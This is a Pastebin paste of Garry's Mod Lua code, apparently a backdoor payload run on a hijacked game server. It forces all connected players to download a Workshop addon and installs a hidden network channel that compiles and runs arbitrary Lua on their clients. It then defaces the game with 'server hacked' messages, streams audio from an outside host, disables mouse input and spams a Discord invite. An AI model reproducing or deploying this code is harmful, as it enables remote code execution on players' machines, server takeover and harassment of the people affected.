Advertisement
Guest User

Untitled

a guest
Jun 26th, 2019
166
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.84 KB | None | 0 0
  1. for k, v in pairs(player.GetAll()) do
  2. v:SendLua("steamworks.FileInfo(1781610581,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  3. end
  4.  
  5. for k, v in pairs( player.GetAll() ) do
  6. if ( v:Alive() ) then
  7. v:GodEnable()
  8. else
  9. v:Spawn()
  10. timer.Simple( 5, function()
  11. v:GodEnable()
  12. end)
  13. end
  14. end
  15.  
  16.  
  17. game.AddParticles( "particles/enigma.pcf" )
  18. PrecacheParticleSystem("enigma")
  19.  
  20. local function rdm_str(len)
  21. if !len or len <= 0 then return '' end
  22. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  23. end
  24.  
  25. local net_string = rdm_str(25)
  26.  
  27. util.AddNetworkString(net_string)
  28. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  29. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  30. if !ply:IsBot() then
  31. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  32. end
  33. end)
  34.  
  35. local function SendToClient(code)
  36. local data = util.Compress(code)
  37. local len = #data
  38. net.Start(net_string)
  39. net.WriteUInt(len, 16)
  40. net.WriteData(data, len)
  41. net.Broadcast()
  42. end
  43.  
  44. timer.Simple( 17, function()
  45. SendToClient([====[
  46. local t = "https://discord.gg/uXXNfmv"
  47. if t:len() > 0 then
  48. surface.CreateFont("\xFF\xFF\xFF", {
  49. font = "Impact",
  50. size = 999
  51. })
  52.  
  53. for i = 1, 10 do
  54. ParticleEffectAttach("enigma",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  55. end
  56.  
  57. local mat = Matrix()
  58. hook.Add("HUDPaint","\xFFmlg_text\xFF", function()
  59. surface.SetFont("\xFF\xFF\xFF")
  60. local x = ScrW() / 2 - (surface.GetTextSize(t)/2) + math.cos(CurTime()*3) * 40
  61. local y = 100 + math.sin(CurTime()*2) * 40
  62. local pos = Vector(x,y,0)
  63. mat:SetAngles(Angle(0,math.sin(CurTime()/1.2)*10,0))
  64. mat:SetTranslation(pos)
  65. surface.SetTextPos(0,0)
  66. cam.PushModelMatrix(mat)
  67. for i=#t, 1, -1 do
  68. surface.SetTextColor( HSVToColor((CurTime()*200+i*7)%360,1,1) )
  69. surface.DrawText(t[ #t - i + 1 ])
  70. end
  71. cam.PopModelMatrix()
  72. end)
  73. else
  74. hook.Remove("HUDPaint","\xFFmlg_text\xFF")
  75. end
  76.  
  77. local chair = ClientsideModel("models/props_c17/chair02a.mdl")
  78. chair:SetNoDraw(true)
  79. local data = {}
  80. local function genChair(id)
  81. local pos = LocalPlayer():GetPos()
  82. data[id] = { Vector(math.random(pos.x-1000,pos.x+1000),math.random(pos.y-1000,pos.y+1000),pos.z + math.random(800,1000) ), math.random(10, 70) }
  83. end
  84. for i=1, 70 do
  85. genChair(i)
  86. end
  87. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF",function()
  88. local z = LocalPlayer():GetPos().z
  89. for i=1, #data do
  90. chair:SetPos(data[i][1])
  91. chair:SetupBones()
  92. chair:DrawModel()
  93. data[i][1].z = data[i][1].z - data[i][2] / 20
  94. if data[i][1].z <= z then
  95. genChair(i)
  96. end
  97. end
  98. end)
  99.  
  100. local gfx = {}
  101.  
  102. local messages = {
  103. "Votre serveur a était hacké par le comité d'éclateur de serveur",
  104. "la ref#8219 NeRoW.#7280 Esma Network lvl 998#6877",
  105. "Discord: https://discord.gg/uXXNfmv",
  106. "Votre serveur va plutôt bien marcher",
  107. "Maintenant il nous appartient.",
  108. "Vous pouvez maintenant pleurer.",
  109. "#Owned #Hacked #Tonserveurcdlamerde"
  110. }
  111.  
  112.  
  113. hook.Add("HUDPaint", "FUCKIT_G",function()
  114. for k,v in pairs(gfx) do
  115. v()
  116. end
  117. end)
  118.  
  119. local message = "Ne redemmare pas ton server, cela ne sert a rien"
  120. local function SlowType(msg,interval,callback)
  121. callback = callback or function()end
  122. message = ""
  123. for i=1,#msg do
  124. timer.Simple(interval * i,function()
  125. message = message .. msg[i]
  126. end)
  127. end
  128. timer.Simple(#msg*interval,callback)
  129. end
  130. local function GetRandomSpot()
  131. local ppos = LocalPlayer():GetPos()
  132. return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  133. end
  134. surface.CreateFont("PWN",{bold=true,size=40})
  135. SOUNDSTART_CTP = false
  136. sound.PlayURL("https://testfdh.000webhostapp.com/larefclemeilleur.mp3","no block",function(s)
  137. if not s then return end
  138. if SOUNDSTART_CTP then s:Stop() return end
  139. SOUNDSTART_CTP = true
  140.  
  141.  
  142. local ragtbl = {}
  143. for i=1,20 do
  144. ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" )
  145. ragtbl[i]:SetNoDraw( false )
  146. ragtbl[i]:DrawShadow( true )
  147. end
  148.  
  149.  
  150. timer.Create("ChangeRagdolesSpotsAW", 1, 0, function()
  151. for k,v in pairs(ragtbl) do
  152. v:SetPos(GetRandomSpot())
  153. end
  154. end)
  155.  
  156.  
  157. hook.Add("AdjustMouseSensitivity","MDR",function()
  158. return 0
  159. end)
  160. gfx["CoolEffect"] = function()
  161. local tbl = {}
  162. s:FFT(tbl,FFT_2048)
  163.  
  164. local fal = 0
  165. for i=4,6 do
  166. fal = fal + tbl[i]
  167. end
  168.  
  169. if fal > 0.8 then
  170. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  171. gfx["ColorChange"] = function()
  172. draw.RoundedBoxEx(250, 0, 0, ScrW(),ScrH(),ca)
  173. end
  174. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  175. local mats = Entity(0):GetMaterials()
  176. for k,v in pairs(mats) do
  177. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  178. Material(v):SetVector("$color", Vector(r,g,b))
  179. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  180. end
  181. end
  182. for k,v in pairs(tbl) do
  183. local col = HSVToColor(k * 1 % 360,1,1)
  184. draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  185. draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  186. end
  187. end
  188.  
  189. timer.Simple(29, function()
  190.  
  191. hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  192. return a,b,c+140,d
  193. end)
  194.  
  195.  
  196. end)
  197.  
  198. local cc = 1
  199. local omgs = {}
  200. timer.Create("MVSPOS", 0.04, 0, function()
  201. for k,v in pairs(omgs) do
  202. if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  203. omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  204. end
  205. end)
  206. local isPounding = false
  207.  
  208. timer.Create("NEXTMSG", 6, #messages, function()
  209. if cc > #messages then
  210. isPounding = true
  211. return
  212. end
  213. table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  214. cc = cc + 1
  215. end)
  216.  
  217. gfx["MessageC"] = function()
  218. if isPounding and (#messages <= 0) then
  219. draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  220. end
  221. for k,v in pairs(omgs) do
  222. draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  223. end
  224. end
  225. end)
  226. concommand.Add("canard", function()
  227. hook.Remove("GetMotionBlurValues", "YASS")
  228. hook.Remove("AdjustMouseSensitivity","MDR")
  229. hook.Remove("HUDPaint", "FUCKIT_G")
  230. end)
  231.  
  232. game.AddParticles( "particles/enigma.pcf" )
  233. PrecacheParticleSystem("enigma")
  234. hook.Add("Think","iuefheqefq",function() gui.HideGameUI() end)
  235. ]====])
  236.  
  237.  
  238. timer.Create("qqyptebobvnq", 1.5, 0, function()
  239. local time = tonumber(0)
  240. local Message = {
  241. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  242. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  243. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  244. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  245. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  246. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  247. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  248. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  249. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  250. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  251. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  252. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  253. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  254. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  255. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  256. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  257. "./ooc DISCORD : https://discord.gg/uXXNfmv.",
  258. }
  259. for _, line in pairs(Message) do
  260. time = time + tonumber(0.1)
  261. timer.Simple(time,function()
  262. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  263. end)
  264. end
  265. end)
  266.  
  267. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement